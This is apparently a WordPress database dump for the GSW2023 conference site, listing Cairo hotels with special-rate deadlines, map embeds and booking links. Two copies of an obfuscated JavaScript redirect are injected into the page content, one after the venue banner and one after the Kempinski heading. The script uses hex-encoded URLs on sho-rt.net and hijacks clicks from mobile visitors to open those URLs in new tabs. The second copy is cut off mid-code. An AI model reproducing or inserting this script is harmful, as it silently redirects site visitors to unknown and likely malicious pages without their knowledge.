link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2022-10-09 02:50:44','2022-10-09 02:50:44','',2679,'https://gsw2023.com/?p=2684',0,'revision','',0),
(2685,1,'2022-10-09 02:54:59','2022-10-09 02:54:59','[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\r\n</li>\r\n</ul>\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\r\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\r\n[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\r\n<h4></h4>\r\n<ul>\r\n 	<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is September 1, 2023</span></h4>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\r\n<span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span>\r\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\r\n\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is </span><span style=\"color: #3366ff;\">September 1, 2023</span></h4>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\r\n</ul>\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe>\r\n<ul>\r\n 	<li>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\r\n</li>\r\n</ul>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\r\n[/dt_banner]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 